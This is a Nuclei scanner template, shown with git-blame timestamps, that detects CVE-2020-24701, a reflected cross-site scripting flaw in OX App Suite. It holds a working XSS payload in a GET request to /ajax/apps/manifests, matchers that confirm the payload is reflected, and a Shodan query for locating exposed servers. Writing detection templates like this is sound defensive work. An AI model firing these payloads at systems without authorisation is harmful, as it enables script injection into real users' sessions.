2023-11-07 17:52:34 +00:00
|
|
|
id: CVE-2020-24701
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: OX Appsuite - Cross-Site Scripting
|
|
|
|
author: DhiyaneshDk
|
|
|
|
severity: medium
|
|
|
|
description: |
|
|
|
|
OX App Suite through 7.10.4 allows XSS via the app loading mechanism (the PATH_INFO to the /appsuite URI).
|
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/163527/OX-App-Suite-OX-Guard-OX-Documents-SSRF-Cross-Site-Scripting.html
|
|
|
|
- https://seclists.org/fulldisclosure/2021/Jul/33
|
2023-11-09 10:26:09 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-24701
|
2023-11-07 17:52:34 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
|
|
|
cve-id: CVE-2020-24701
|
|
|
|
cwe-id: CWE-79
|
|
|
|
epss-score: 0.00513
|
|
|
|
epss-percentile: 0.74074
|
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-11-09 10:26:09 +00:00
|
|
|
verified: true
|
|
|
|
shodan-query: html:"Appsuite"
|
2023-11-07 17:52:34 +00:00
|
|
|
vendor: open-xchange
|
|
|
|
product: open-xchange_appsuite
|
|
|
|
tags: cve,cve2020,appsuite,xss
|
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2023-11-09 10:26:09 +00:00
|
|
|
- '{{BaseURL}}/ajax/apps/manifests?action=all&format=debug&xss=<script>alert(document.domain);</script>'
|
2023-11-07 17:52:34 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- 'Request with action all'
|
2023-11-09 10:26:09 +00:00
|
|
|
- '<script>alert(document.domain);</script>'
|
2023-11-07 17:52:34 +00:00
|
|
|
condition: and
|
|
|
|
|
2023-11-09 10:26:09 +00:00
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
|
2023-11-07 17:52:34 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-11-09 10:31:47 +00:00
|
|
|
# digest: 490a004630440220287a82c49e19edb5d0fedfe2441367495a49ab6a51290463d93e3fe59d1af13c022049c64d5e4fc361d9a585380a8bff21bea49948c0bab4bcbfff700157919d1a83:922c64590222798bb761d5b6d8e72950
|